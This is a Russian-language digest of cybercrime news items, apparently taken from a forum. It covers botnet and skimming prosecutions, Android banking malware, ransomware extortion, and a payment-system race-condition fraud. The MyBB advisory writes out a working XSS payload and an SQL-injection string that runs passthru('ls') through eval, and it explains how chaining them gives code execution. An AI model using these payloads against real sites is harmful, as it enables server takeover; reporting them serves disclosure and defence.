По версии американских властей, Левашов участвовал в хищении данных при помощи Kelihos, которая использовалась в том числе для распространения нежелательных сообщений с сомнительным рекламным контентом. Кроме того, бот-сеть, по данным американских правоохранительных органов, применялась также в целях прямого заражения компьютеров вредоносным программным обеспечением с целью хищения банковских данных пользователей.
Левашов был задержан в Барселоне в апреле 2017 года, его выдачи наряду с США добивалась также Россия, настаивая на политической подоплеке его преследования со стороны Вашингтона. Тем не менее в феврале 2018 года россиянин был экстрадирован в Соединенные Штаты. На сайте Министерства юстиции США указывается, что оглашение приговора запланировано на 5 апреля этого года.
Сотрудник пультовой охранной компании, владеющий продвинутыми навыками работы за компьютером, раздобыл информацию о том, что платежная система ГлобалМани под повышенной нагрузкой начинает работать некорректно. Высокая частота запросов к серверу компании вызывает нарушения в системе обработки информации (учете средств на балансах кошельков пользователей).
Это приводит к ошибке, когда деньги с кошелька плательщика не списываются, но при этом засчитываются на кошелек получателя. Подобный сбой позволяет добыть деньги буквально «из воздуха». Узнав об этом, хакер разработал план личного обогащения за счет несанкционированного вмешательства в работу информационных ресурсов системы ГлобалМани.
Данная платежная система действует в Украине на основании лицензии на перевод денег, выданной Национальным банком Украины еще в 2013 году. Технически, она представляет собой автоматизированную систему, состоящую из серверного и коммуникационного оборудования, а также облачных сервисов.
ПО, установленное на сервере, обеспечивает проведение операций с деньгами; коммуникационное оборудование обеспечивает обмен данными между серверным оборудованием и объединяет его в распределенный финансовый кластер, масштабирование которого осуществляется при помощи облачных сервисов.
«Кошельки» ГлобалМани – это электронные записи в базе данных платежной системы, которая, в свою очередь, содержит всю информацию о количестве денег, эмитированных системой, а также балансе кошельков всех агентов, торговцев и пользователей системы.
Реализуя свой план, хакер завел кошелек в платежной системе и, пополнив кошелек на 4482,5 грн, при помощи специального вредоносного ПО, передал к серверу ГлобалМани одновременно 23 ложных запроса на вывод 4,4 тыс. гривен на банковскую карту и один успешный. Такое количество запросов вызвало технические проблемы с проведением платежей в платежной системе.
Далее, он направил 17,017 успешных запросов о переводе денег на разные суммы, между 5-ю, принадлежащими ему, кошельками. Это вызвало желаемый эффект: отправляемые деньги не списывались, но при этом, зачислялись на счета- получатели.
Следующим шагом, хакер продолжил грузить сервер запросами на изменение пароля к одному из кошельков, после чего, администрации платежной системы пришлось принудительно отключить сервера, что вызвало аварийную остановку в работе сайта платежной системы.
В результате спланированной диверсии, молодой человек сумел сгенерировать на своих счетах за счет системной ошибки более 51 тысячи гривен, которые успешно вывел на подставную банковскую карту.
Главной зацепкой, которая помогла правоохранителям выйти на след киберпреступника, стали его домашний IP-адрес и MAC-адрес компьютера, зафиксированные системой ГлобалМани. Именно с этих адресов он авторизовался в проблемных кошельках во время проведения атаки.После того, как правоохранители предъявили ему подозрение, молодой человек чистосердечно раскаялся и возместил ущерб.
Рассмотрев личность обвиняемого, суд пришел к выводу, что преступник, совершивший несанкционированное вмешательство в работу компьютерных систем (ст. 361 УК), представляет среднюю угрозу для общества и может быть освобожден от наказания (тюремное заключение на 2 года), при условии, что в течение 2 лет он не совершит новых преступлений, будет регулярно отмечаться в специальном органе пробации и не покинет пределов Украины.
• Source: reyestr.court.gov.ua/Review/97586318
Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по г. Санкт-Петербургу и Ленинградкой области задержали 16-летнего юношу по подозрению в совершении преступления, связанного с неправомерным доступом к компьютерной информации.
«Предварительно установлено, что молодой человек осуществлял техническую поддержку деятельности мошеннических кол-центров. Все инструкции и указания поступали ему от кураторов, находящихся на территории Украины.
По имеющимся данным, вакансию специалиста этого профиля с ежемесячным вознаграждением в криптовалюте подозреваемый нашел в теневом сегменте Интернета. Обязательным условием было наличие технических навыков по поддержанию функционирования оборудования, которое обеспечивало подмену номеров при звонках гражданам Российской Федерации из украинских кол-центров. Иными словами, мошенники звонили с территории соседнего государства, а потерпевшие видели на экранах своих мобильных телефонов номера российских операторов.
В городе на Неве подозреваемый арендовал однокомнатную квартиру, куда организаторы противоправной деятельности при помощи курьерской службы доставили соответствующее оборудование: четыре GSM-шлюза, две тысячи сим-карт, а также ноутбук с программным обеспечением, позволяющим совершать звонки через Интернет.
С целью конспирации молодой человек каждую неделю менял съемные квартиры, а также не реже одного раза в сутки производил замену сим-карт в слотах сим- банков.
В результате дальнейших оперативно-розыскных мероприятий полицейские вышли на след еще двоих сообщников, которые также выполняли функции системных администраторов и работали на схожих условиях.
Кроме того, старший из них еженедельно получал из Москвы порядка трех тысяч сим-карт, которые распределял между соучастниками.
Возбуждено несколько уголовных дел, которые в настоящее время соединены в одно производство. Фигурантам инкриминируется совершение преступлений, предусмотренных статьей 159 УК РФ. Им избрана мера пресечения в виде заключения под стражу. Предварительное расследование продолжается, устанавливаются все участники криминальной схемы», - сообщила официальный представитель МВД России Ирина Волк.
18 августа, судья Первомайского районного суда Игорь ШЕВЧЕНКО признал виновным 23-летнего омича Сергея РУСИНОВА в совершении преступления в сфере защиты компьютерной информации (ч.1 ст.274.1 УК РФ), уточнили KVnews в суде.
«Суд приговорил фигуранта уголовного дела к исправительным работам сроком на один год с удержанием 10% с заработной платы в доход государства и постановил назначенное наказание считать условным с испытательным сроком на один год», – передаёт пресс-служба УФСБ по Омской области.
Ранее суть гособвинения уточнил старший помощник прокурора Омской области Дмитрий ПАВЛЕНКО:
«Следствием установлено: 26 сентября 2020 года фигурант, находясь в компьютерном клубе, используя специальное программное обеспечение, позволяющее проводить аудит безопасности информационного ресурса посредством загрузки и запуска данной программы на сторонних компьютерах, произвёл воздействие на информационную систему Администрации города Омска, выразившееся в сканировании сервера в поисках уязвимости с внедрением вредоносного кода на определённую страницу сайта. Вину в совершённом преступлении обвиняемый признал полностью, заявив о раскаянии в содеянном».
Бедному бразильскому таксисту Антонио Перейра ду Насимента сказочно повезло: один из банков перевёл ему 131 870 227 реалов.
Деньги предназначались другому банку, но по ошибке пришли ему на карту. Увидев огромную сумму в приложении, Антонио испугался, ведь он никогда не видел таких денег.
Он рассказал о происшествии жене, и она отправила его в банк возвращать деньги. Он написал заявление о возврате средств и к вечеру снова стал бедняком.
Администрация Байдена требует перехода на безопасные языки программирования.
Офис национального директора по кибербезопасности (ONCD) Белого дома США в рамках доклада о способах снижения количества уязвимостей в проектах и возможности в будущем улучшить надёжность ПО призвал разработчиков ПО в долгосрочной перспективе отказаться от небезопасных (в рамках работы с памятью) языках программирования С и С++ и перейти на более современные решения с высокой безопасностью памяти, например, Rust, Python и Java.
Представители ONCD объяснили, что подобные уязвимости связаны с ошибками управления памятью, например доступа к ней, заполнения, распределения и освобождения. Они возникают, когда программное обеспечение обращается к памяти способами, которые не были предусмотрены или являются небезопасными, тем самым создавая угрозы безопасности. Например, хакеры могут использовать эти уязвимости для получения неавторизованного доступа к пользовательским данным или для запуска вредоносного кода на устройстве. Недавние исследования Microsoft и Google показали, что около 70% всех уязвимостей в сфере безопасности вызваны проблемами с безопасностью памяти, говорится в отчете.
В докладе ONCD отмечается, что такие уязвимости являются серьёзной проблемой для цифровой экосистемы уже более 35 лет и что решение задачи устранения целых классов программных уязвимостей крайне важно и требует срочных действий. Организация подчёркивает, что важно внедрять новые подходыдля снижения подобных рисков.
В пресс-релизе Белого дома говорится, что технологические компании могут
«предотвратить целые классы уязвимостей, не допуская их в цифровую
экосистему», выбирая безопасные языки программирования.
При этом в ONCD осознают, что переход на новые языки программирования
потребует времени и может занять многие годы, возможно, даже десятилетия.
Однако они уверены, что разработчики, которые сделают правильный выбор в
пользу безопасности, выиграют в долгосрочной перспективе, получив более
защищённую среду для разработки и продвижения своих проектов.
Авторы доклада отмечают, что «самый действенный способ уменьшить количество уязвимостей безопасности памяти — это гарантировать надёжность одного из составных элементов кибербезопасности: языка программирования. Использование языков программирования, обеспечивающих безопасность памяти, может исключить большинство ошибок безопасности памяти». В качестве примера особенно подходящего языка упоминается Rust.
Ранее Агентство национальной безопасности США также рекомендовало организациям перейти на более безопасные языки программирования, такие как C#, Go, Java, Ruby, Rust и Swift, чтобы избежать определённых типов уязвимостей, связанных с управлением памятью. По данным отчета АНБ, злоумышленники все чаще и чаще начинают использовать уязвимости, связанные с управлением памятью, так как что C и C++ не обеспечивают должный уровень безопасности при работе с ней. Согласно документу, с помощью этих брешей в защите хакерам удается с легкостью получать доступ к конфиденциальной информации, выполнять произвольный код и нарушать цепочки поставок ПО.
sc: whitehouse.gov/wp-content/uploads/2024/02/Final-ONCD-Technical-Report.pdf
С ноября 2023 года клиенты банков в Центральной Азии стали мишенью для нового штамма Android-вредоносного ПО, получившего кодовое название Ajina.Banker. Цель этого вредоносного ПО — кража финансовой информации и перехват сообщений для двухфакторной аутентификации (2FA).
Компания Group-IB, которая обнаружила угрозу в мае 2024 года, сообщила, что вредоносное ПО распространяется через сеть Telegram-каналов, созданных злоумышленниками под видом легитимных приложений, связанных с банковскими услугами, платежными системами, государственными сервисами или повседневными утилитами.
" Злоумышленники организовали сеть аффилированных лиц, мотивированных финансовой выгодой, распространяющих Android-банковский вирус, нацеленный на обычных пользователей", — сообщили исследователи безопасности Борис Мартынюк, Павел Наумов и Анвар Анаркулов.
Среди стран, ставших объектами атаки, числятся: Армения, Азербайджан, Исландия, Казахстан, Кыргызстан, Пакистан, Россия, Таджикистан, Украина и Узбекистан.
Click to expand...
Некоторые элементы распространения вредоносного ПО через Telegram, вероятно, были автоматизированы для повышения эффективности. Злоумышленники создавали множество Telegram-аккаунтов, с которых отправляли специально подготовленные сообщения. В них содержались ссылки — на другие Telegram-каналы или внешние ресурсы с APK-файлами, которые ничего не подозревающие пользователи загружали на свои устройства.
Использование ссылок на Telegram-каналы, где размещены вредоносные файлы, помогает обходить меры безопасности и ограничения многих чатов. Это позволяет злоумышленникам избежать блокировки при автоматической модерации.
Они также маскируют вредоносные файлы под акции и раздачи с обещанием крупных вознаграждений и эксклюзивных услуг, что повышает вероятность заражения. Такие методы особенно эффективны в локальных чатах, так как сообщения адаптированы к интересам и потребностям местных пользователей. Это позволяет Ajina увеличить успех своих атак.
Также злоумышленники используют несколько аккаунтов для массовой рассылки сообщений одновременно, что указывает на скоординированную атаку с возможной автоматизацией.
Само вредоносное ПО работает достаточно просто: после установки оно связывается с удалённым сервером и запрашивает у пользователя разрешение на доступ к SMS, номерам телефонов и информации о сети.
Ajina.Banker собирает данные о SIM-карте, установленных финансовых приложениях и сообщения, которые затем отправляет на сервер. Новые версии этого вируса также пытаются собирать банковскую информацию через фишинговые страницы. Вирус может получить доступ к журналам вызовов, контактам и использовать службы доступности Android, чтобы предотвратить удаление и получить дополнительные права.
Google сообщила The Hacker News, что вредоносное ПО не распространяется через Google Play Store, и пользователи Android защищены системой Google Play Protect, которая включена по умолчанию на устройствах с Google Play Services.
"Найм Java-разработчиков и создание Telegram-бота с предложением заработать также указывают на то, что инструмент активно развивается и поддерживается сетью аффилированных сотрудников," отметили исследователи.
"Анализ имён файлов, методов распространения и других действий злоумышленников позволяет предположить, что они хорошо знакомы с культурой региона, в котором оперируют."
Эти данные появились на фоне открытия компании Zimperium, обнаружившей связи между двумя семействами Android-вредоносов, отслеживаемыми как SpyNote и Gigabud (часть семейства GoldFactory, куда также входит GoldDigger).
"Домены с очень похожей структурой (с использованием одинаковых необычных ключевых слов в субдоменах) и цели для распространения образцов Gigabud также использовались для распространения образцов SpyNote," отметила компания. "Это пересечение в распространении указывает на то, что за обеими семьями вредоносного ПО, вероятно, стоит один и тот же злоумышленник, что свидетельствует о хорошо спланированной и широкой кампании."
[Источник](https://thehackernews.com/2024/09/new-android-malware-ajinabanker- steals.html)
сторонние магазины на 3 года получат возможность выходить прямо в Play Store.
Что это значит:
— Разработчикам дадут доступ ко всем приложениям из Google Play Store;
— Google больше не смогут предлагать разрабам деньги или льготы за отказ запуска своих приложений в других магазинах;
— Никакой эксклюзивности Google Play Store для конкретных телефонов;
— Также запретили заключать контракты за эксклюзивные релизы;
— Разрешат использовать другие способы оплаты, помимо Google Play Billing - больше драть огромную комиссию не получится;
— Можно будет указывать ссылки на способы загрузки приложений за пределами Play Store.
По данным Reuters, Google планирует обжаловать решение.
В свободном движке для создания web-форумов MyBB выявлено несколько уязвимостей, которые в сочетании позволяют организовать выполнение PHP-кода на сервере. Проблемы проявляются в выпусках с 1.8.16 по 1.8.25 и устранены в обновлении MyBB 1.8.26.
Первая уязвимость (CVE-2021-27889) позволяет непривилегированному участнику форума встроить JavaScript-код в публикации, обсуждения и приватные сообщения. Форум допускает добавление изображений, списков и мультимедийных данных через специальные теги, которые преобразуются в HTML-разметку. Из-за ошибки в коде преобразования подобных тегов, конструкция с двойным URL
PHP:Copy to clipboard
[img] http://xyzsomething.com/image?)http://x.com/onerror=alert(1);// [/img]
преобразуется в
PHP:Copy to clipboard
<img src="http://xyzsomething.com/image?)<a href=" http:="" x.com=""
onerror="alert(1);//"" target="_blank" rel="noopener" class="mycode_url">
Вторая уязвимость (CVE-2021-27890) даёт возможность осуществить подстановку SQL-команд и добиться выполнения своего кода. Проблема возникает из-за подстановки $theme['templateset'] в тело SQL-запроса без должной чистки и выполнении компонентов ${...} через вызов eval. Например, можно организовать запуск PHP-команды passthru('ls') при обработке темы оформления с конструкцией вида:
PHP:Copy to clipboard
<templateset>') AND 1=0 UNION SELECT title, '${passthru(\'ls\')}' from mybb_templates -- </templateset>
Для эксплуатации второй уязвимости необходимо использование сеанса с правами администратора форума. Для получения возможность отправки запроса с правами администратора атакующий может воспользоваться первой уязвимостью и отправить администратору приватное сообщение с JavaScript-кодом, при просмотре которого будет эксплуатирована вторая уязвимость.
• Source: https://blog.sonarsource.com/mybb-remote-code-execution-chain
Служба безопасности Украины (СБУ) предотвратила масштабную атаку, которую провела «подконтрольная ФСБ РФ» хакерская группировка. Хакеры пытались получить доступ к секретным данным украинских властей.
«Киберспециалисты СБУ блокировали масштабную хакерскую атаку подконтрольной ФСБ РФ хакерской группировки Armageddon.»,— сообщается на сайте СБУ. Действия хакеров, по версии СБУ, были направлены на получение доступа к секретным данным высших органов государственной власти Украины.
Сотрудники СБУ при посредничестве координационного центра кибербезопасности при Совете национальной безопасности и обороны (СНБО) «нейтрализовали последствия» взлома.
Подробнее: https://www.securitylab.ru/news/517511.php
Атака могла быть организована через взломанную APK-версию кошелька BitKeep.
Команда по кибербезопасности PeckShield Alert сообщила, что хакеры взломали криптокошельки пользователей BitKeep и украли активы на $8 млн. По данным команды , потери включают ~4373 BNB, 5,4 млн USDT, 196 000 DAI и 1233,21 ETH.
Специалисты по безопасности BitKeep предположили, что атака могла быть организована через взломанную APK-версию кошелька BitKeep, которую скачали некоторые пользователи. Поэтому команда призвала клиентов пользоваться только официальной версией кошелька, скачанной из магазинов приложений Google Play и Apple App Store. Кроме того, BitKeep настоятельно рекомендовала членам сообщества использовать вновь созданные адреса кошельков, поскольку предыдущие уже могли утечь к хакерам.
Руководство BitKeep пообещало пользователям вернуть украденные средства, если в ходе расследования выяснится, что эксплойт произошел по вине BitKeep.
BitKeep — это децентрализованный криптовалютный кошелек от компании Bitget, работающий с более чем 70 различными блокчейнами, среди которых Polygon, Solana, BNB Chain, Ethereum, TRON, Fantom и другие. Проект обслуживает почти 6 млн пользователей в 168 странах, говорится на сайте компании.
source: twitter.com/peckshield/status/1607267285949120513
Правительство республики подтвердило в среду, что хакеры Conti требуют "выкуп"
в размере 10 миллионов долларов за то, чтобы не публиковать информацию,
извлеченную из серверов нескольких государственных учреждений, включая
Министерство финансов.
По словам Хорхе Мора, директора отдела цифрового управления Министерства
науки, инноваций, технологий и телекоммуникаций (Micitt), запрос был сделан
через сообщение в "темной паутине".
Техническими группами Казначейства, которые держат ситуацию под контролем, не было выявлено никакого конкретного выкупа. В темной паутине, где была сделана публикация, называется сумма в 10 миллионов долларов", - пояснил пресс-секретарь.
"Что касается группы или организации, которая предположительно стоит за этим, то это, по-видимому, Conti Group, и именно на этой странице в темной паутине власти сделали объявление", - добавил он.Click to expand...
Они не будут платить
Как указал ранее на этой неделе министр финансов Элиан Вильегас, глава
президентской администрации Геанинна Динарте настаивала на том, что
правительство не будет отвечать на требования хакеров.
"Эта ситуация явно заслуживает максимальной технической тщательности, и мы действуем с такой тщательностью; но мы также должны помнить, что мы столкнулись с ситуацией, которая была организована транснациональной организованной преступностью, и это заслуживает того, чтобы страна заняла твердую позицию.
"Мы не готовы мириться с вымогательством и, следовательно, не готовы выплачивать вознаграждение", - сказал Динарте.Click to expand...
RACSA, Национальный метеорологический институт, Micitt и Фонд социального обеспечения Коста-Рики также подверглись кибератакам на свои платформы.
[Source](https://www.teletica.com/nacional/gobierno-confirma-que-conti- exige-10-millones-de-rescate_309715)
В федеральной прокуратуре Восточного округа штата Вирджиния в Александрии сообщили, что 15 мая признал себя виновным в мошенничестве и хищении личных данных 35-летний Армен Саплекчян, эмигрант из Армении, проживающий в калифорнийском городе Глендейл, где находится одна из крупнейших армянских общин за пределами этой страны – больше 65 тысяч человек.
Суть предъявленных ему обвинений состоит в уже привычном “киберскимминге” – считывании с помощью специального устройства данных кредитных и дебитных карт, а затем получении денег по этим картам. Чаще всего такие устройства устанавливаются на панелях или рядом с панелями банкоматов, но Саплекчян с сообщниками пошли по другому, тоже уже накатанному пути, который называется “бензоскимминг” (Gas Pump Skimming).
Здесь позволительно и даже полезно напомнить краткий курс истории “русской мафии в США”. Она началась с робких ростков бандитизма в 1970-х годах и окрепла в начале 1980-х, когда с позволения итальянской Коза Ностры “русские”, а точнее иммигранты-евреи из СССР, отобрали у иммигрантов-греков бензиновый бизнес на заправочных станциях. Греки тихо воровали на недоливе и пересортице, платили итальянцам за крышу, и никто не знал горя до волны брежневской иммиграции. Аферы с бензином и соляркой стали щедрыми кормильцами множества наших иммигрантов и, соответственно, составом множества преступлений. В 1982 году законодатели штата Нью-Йорк приняли новый закон о налогах на бензин и дизельное топливо. Если раньше налоговики пользовались данным счетчиков на АЗС, то теперь налоги стали брать с компаний-поставщиков. В целях помощи бедноте власти штата освободили от налогов отопительную солярку, которая ничем не отличается от автомобильной. Ну и, конечно, бензин в штате Нью-Йорк стоил ощутимо дороже, чем в соседнем Нью-Джерси, до которого через реку рукой подать.
Всем этим немедленно воспользовались сметливые “евреи из СССР”, и процесс пошел. Появились так называемые “гирлянды” – подставные оптовые компании, которые перепродавали друг другу топливо, а последняя компания в “гирлянде” распродавала топливо по АЗС, после чего сворачивала дела, уничтожала документы и исчезала. Среди моих очень приличных и высокоуважаемых знакомых из бруклинского demi mond почти все “плавали” в бензиновом бизнесе. Дело было крайне выгодным и не очень опасным, но концы все же находились, и вплоть до недавних пор “бензинщиков” 80-х годов арестовывали и сажали в тюрьмы, причем иных по нескольку раз. После того, как наши правоохранители научились расплетать бензиновые “гирлянды” этот бизнес угас, а с появлением киберпреступности заговорили о его современной разновидности – “бензоскимминге” (Gas Pump Skimming), куда менее прибыльной и куда более безопасной.
Отличие “бензо-” от обычного “скимминга” в том, что считывающие устройства устанавливают на панелях не банкоматов, а автоматов АЗС, чем и занимался арестованный 29 января 2018 года в Фэйфаксе, штат Вирджиния, Армен Саплекчян. Как гласит пресс-релиз федеральной прокуратуры от 15 мая, когда он признал себя виновным, Саплекчян “вступил в сговор с минимум шестью сообщниками с целью похищения не менее 18 тысяч номеров кредитных и дебитных карт, а также номеров личных данных, связанных с украденными картами”. Соучастниками сговора значатся 31-летний Рудольф Мелканян, 25-летний Радик Карапетян, 23-летний Сирануш Енгибарян, 28-летний Мушег Мелконян, 37-летний Тимбурек (хотя, скорее всего, его зовут Тимурбек) Хасанов, все из Калифорнии, а также 47-летний Анатолий Зинченко из Пенсильвании.
Эта группа, утверждается в пресс-релизе и, соответственно в обвинении, “прикрепляла «скиммеры» к системам автоматов бензозаправок и собирала информацию, когда карты для оплаты [бензина] вставляли в прорезь на панели автомата ничего не подозревающие их владельцы”. Затем украденные данные переносились на поддельные карты, по которым участники преступной группы снимали тысячи долларов в банкоматах северной Вирджинии, Мэриленда и города Вашингтона, а также покупали на них аккредитивы (money order) федеральной почты. Следователь группы борьбы с финансовыми преступлениями министерства внутренней безопасности Морис Хоутон на 16 страницах аффидевита разъяснил судье-магистрату Терез Бьюкенен суть “бензоскимминга”. Если это устройство работает через систему мобильной связи Bluetooth, то считанные данные карты могут передаваться на лэптоп или сотовый телефон, которые находятся в радиусе примерно 300 метров от АЗС.
Считанные или, как говорят в Америке, “скомпрометированные” участниками данной преступной группы кредитные и дебитные карты были выданы их законным владельцам банками BB&T, Capital One, TD и Citibank. “8 августа 2017 года, – написал в аффидевите следователь Хоутон, – я и полицейские Фэйфракса подъехал к отделению банка BB&T в Фолл-Черч, штат Вирджиния, получив информацию о подозрительной активности рядом с банком. У стоявшего перед входом в BB&T банкоматом мы увидели белого мужчину, детектив полиции опознал в нем лицо, проходящее в деле, как T.K.”. Это был Тимбурек Хасанов (Timburek Khasanov), опознать которого помогла известная полиции татуировка на руке. Полицейские заметили, как Т.К., пользуясь несколькими картами, получил в банкомате деньги, перешел через дорогу на парковку и сел на место пассажира рядом с водителем черного Lexus ES350 с номерным знаком штата Мэриленд. Через несколько минут Lexus покинул парковку и подъехал к банку, где Т.К. вышел и снова получил деньги из того же банкомата. “На основании моей подготовки и опыта, – заключил Морис Хоутон в аффидевите, – поведение Т.К. очень походило на мошенничество с кредитными картами”.
Черный Lexus отъехал от банка BB&T и стал петлять по улицам, а полицейские незаметно ехали следом. На одном перекрестке Lexus нарушил правила, и его остановили, Полицейские подошли, и через окна заметили лежавшие на заднем сиденье подарочные и телефонные карты, хотя видны были только края этих карт с четырьмя цифрами номеров. За рулем Lexus сидел Анатолий Зинченко, которого попросили выйти, и тут Морис Хоутон заметил, что сидящий рядом Т.К. открыл перчаточное отделение под названием “бардачок” и сунул туда руку, Допуская, что он полез за оружием, Хоутон приказал ему выйти из машины, а в “бардачке” оказались тоже подарочные карты, а также большая сумма наличных денег и “мани ордеры”. Зинченко и Т.К. арестовали, их машину обыскали по всем правилам, и нашли снова подарочные карты, а также прикрепленный к приборной панели навигатор GPS, на котором был указан адрес еще одного отделения банка BB&T. Там же нашли три мобильника Apple iPhones. Так, можно сказать, случайно раскрутилось дело “бензоскиммеров, и обвинение этой группе было предъявлено большим жюри 4 апреля, а приговор Армену Саплекчяну назначен на 31 августа. Остальные также признали себя виновными и ждут приговоров, назначенных на разные дни с 20 июля по 10 августа.
Эту группу можно назвать новаторами киберпреступности, но в “бензоскимминге” они были не первыми, а к тому же до них этим занимались тоже американские армяне. В начале января 2014 года районная прокуратура Манхэттена сообщила об арестах 13 эмигрантов из Армении, которых обвинили в отмывании денег и других преступлениях. Четверо обвиняемых жили в Лас-Вегасе, остальные – в Калифорнии, а манхэттенская прокуратура занялась ими потому, что от их аферы пострадали нью-йоркские банки. Главарями той преступной группы назвали Гарегина Спарталяна, Арама Мартиросяна, Хаика Джанджапаняна и Давита Кудугуляна, а их помощниками 8 мужчин и женщин в возрасте от 24 до 64 лет. Все было так же, как сейчас: на автоматах бензозаправок в Джорджии, Южной Каролине и Техасе устанавливали считывающие устройства, похищали данные кредитных и дебитных карт водителей и снимали в банкоматах Манхэттена деньги с их счетов. В общей сложности они похитили больше 2 млн долларов, которые депонировали на семь десятков счетов в банках Калифорнии и Невады и снимали суммы меньше 10 тысяч долларов, чтобы банки не сообщали об этом в налоговую службу. Тогда в пресс- релизе манхэттенского прокурора Сайруса Вэнса “скимминг” без приставки “бензо” был назван одним из самых быстрорастущих в стране, но в обвинении уточнялось, что считывающие устройства были установлены на бензозаправках компаний Raceway и Racetrac и подключены к системе сотовой связи Bluetooth.
Пока “скимминг” процветает, но и борьба с ним тоже не отстает. На прошлой неделе в городском управлении полиции Нью-Йорка сообщили о новшестве, которое помогает победить в войне с кибержуликами, считывающими данные кредитных и дебитных карт в банкоматах. Устройство под названием Skim Reaper стоит 50 долларов, применяется в Нью-Йорке с февраля и способно усмирить преступников, которые, по данным Секретной службы, ежегодно обворовывают клиентов банков США больше чем на миллиард долларов. Skim Reaper похож на обычную кредитную карту, но когда его вставляют в щель банкомата, на экране может появиться сигнал “possible skimmer!”, то есть этот банкомат может быть оснащен считывающим устройством. Занимающийся борьбой с такими преступлениями инспектор полиции Кристофер Фланаген сообщил агентству АР, что четыре его детектива следят за банкоматами с помощью Skim Reaper.
Пакистан сделал визы для россиян бесплатными и пригласил граждан провести отпуск.
Пакистан считается одной из самых опасных стран в мире, но правительство решило избавиться от этого статуса и показать потенциал отдыха в стране, где нельзя носить открытую одежду.
Отпуск мечты: на недельку в Северную Корею, а оттуда в Пакистан.
Министерство юстиции готовит уголовные обвинения в связи с иранской хакерской атакой, целью которой была президентская кампания Дональда Трампа в попытке повлиять на исход ноябрьских выборов, сообщили в четверг два человека, знакомых с ситуацией.
Перспектива привлечения к уголовной ответственности возникла в связи с тем,
что Министерство юстиции выразило тревогу по поводу агрессивных попыток стран,
включая Россию и Иран, вмешаться в президентские выборы между Трампом и
кандидатом от Демократической партии Камалой Харрис, в том числе путем взлома
и скрытых кампаний в социальных сетях, направленных на формирование
общественного мнения
Предвыборный штаб Трампа сообщил 10 августа, что он был взломан, и заявил, что
иранские агенты украли и распространили конфиденциальные внутренние документы.
По крайней мере, в трех новостных изданиях — Politico, New York Times и
Washington Post — произошла утечка конфиденциальных материалов из штаба
Трампа. До сих пор каждый из них отказывался раскрывать какие-либо подробности
о том, что он получил.
Politico сообщило, что 22 июля оно начало получать электронные письма с
анонимного аккаунта. Источник — учетная запись электронной почты AOL,
идентифицированная только как “Роберт”, — передал то, что выглядело как досье
на кандидата в вице-президенты от республиканской партии, сенатора от штата
Огайо Джей Ди Вэнса, которое, по всей видимости, было подготовлено
предвыборной кампанией. Документ был датирован 23 февраля, почти за пять
месяцев до того, как Трамп выбрал Вэнса своим напарником на выборах.
ФБР, офис директора Национальной разведки и Агентство по кибербезопасности и защите инфраструктуры впоследствии обвинили Иран в этом взломе, а также в попытке взлома кампании Байдена-Харриса.
Как тандем двух сервисов стал инструментом шантажа.
Специалисты компании CronUp обнаружили серию атак на репозитории GitHub, в ходе которых злоумышленники стирают содержимое репозиториев и просят связаться с ними через Telegram для получения дальнейших инструкций. Новый метод кибератаки впервые заметил Герман Фернандес из CronUp.
Организатор кампании, действующий под псевдонимом Gitloker в Telegram и выдающий себя за аналитика по инцидентам, вероятно, использует украденные учетные данные для компрометации аккаунтов жертв.
После взлома Gitloker утверждает, что похитил данные и создал их резервную копию, которая может помочь восстановить удалённую информацию. Затем репозиторий переименовывается, а в него добавляется файл README.me с инструкциями для жертвы.
«Надеюсь, это сообщение найдет вас в добром здравии. Это срочное уведомление о том, что ваши данные были скомпрометированы, и у нас есть резервная копия» — такие послания можно найти в записках.
На данный момент представители GitHub не предоставили комментариев по поводу кампании. Однако ранее GitHub советовала пользователям менять пароли и усиливать защиту аккаунтов, чтобы предотвратить несанкционированный доступ. Меры включают в себя:
Атаки на аккаунты GitHub не являются редкостью. В марте 2020 года хакеры заявили о взломе репозиториев Microsoft и краже более 500 ГБ данных. Хотя украденные файлы в основном содержали образцы кода и тестовые проекты, эксперты по безопасности выразили опасения, что в них могли оказаться частные API-ключи или пароли.
В столице Великобритании, Лондоне, стартовала уникальная международная конференция, объединившая представителей 35 стран, а также ключевых игроков бизнеса и технологической сферы. Основной целью этого мероприятия является разработка стратегий противодействия «хакерам по найму» и обсуждение проблематики рынка инструментов для кибератак. В числе участников — ведущие мировые компании, включая Apple, Google и Microsoft, что подчёркивает масштаб и значимость события.
Конференция, запланированная на два дня, инициирована правительством Соединённого Королевства совместно с Францией. Она нацелена на поиск эффективных путей решения проблемы коммерциализации средств кибершпионажа и атак, а также оценку угроз, которые эти инструменты представляют для глобальной безопасности, защиты прав человека и стабильности в киберпространстве.
На конференции было заключено международное соглашение, получившее название «Процесс Палл-Молл» («Pall Mall process»). Этот документ предусматривает координированные действия стран-участниц по противодействию различным киберугрозам. Согласно информации Национального центра кибербезопасности Великобритании (NCSC), рынок инструментов для кибератак удваивается каждые десять лет, что делает проблему особенно актуальной.
Злонамеренное использование таких инструментов может привести к серьёзным последствиям. Атаки могут дать злоумышленникам доступ к устройствам жертв, позволяя прослушивать телефонные разговоры, получать доступ к фотографиям и даже удалённо управлять камерой и микрофоном. Особенно опасным является так называемое «Zero-Click» шпионское ПО, действующее без необходимости каких-либо действий со стороны пользователя.
Проблема «хакеров по найму», предоставляющих услуги корпоративного шпионажа, а также использование подобных инструментов враждебными государствами, ставит под угрозу национальную безопасность не только Великобритании, но и других стран. В этом контексте, заместитель премьер-министра Оливер Дауден подчеркнул значимость международного сотрудничества и работы с единомышленниками для решения проблемы, которая не знает границ.
Пол Чичестер, директор по операциям NCSC, также отметил растущий спрос на возможности проведения злонамеренных киберопераций. Он подчеркнул необходимость развития мирового сектора кибербезопасности для обеспечения защиты цифрового общества и поддержания его целостности.
Таким образом, конференция в Лондоне становится важным шагом на пути к формированию единой международной стратегии борьбы с киберугрозами. Совместные усилия ведущих мировых компаний и правительств стран-участниц направлены на создание эффективных механизмов защиты в киберпространстве, что является ключом к обеспечению глобальной безопасности в современном мире.
sc: standard.co.uk/news/uk/oliver-dowden-national-cyber-security-centre- france-google-microsoft-b1137298.html
Согласно информации на профильных ресурсах, в конце августа 2022 года мошенники обошли систему защиты некоторых банкоматов «Альфа-Банка» и внесли на свои счета фальшивок на более чем 60 млн рублей. Они смогли подделать пятитысячные купюры образца 1997 года. Банкоматы банка, где были организованы внесения денег, не распознали подделку из-за технических проблем. Устройства в итоге зачислили все внесенные средства на счёта мошенников. После этого они смогли снять настоящие денежные средства в других банкоматах без привлечение внимания.
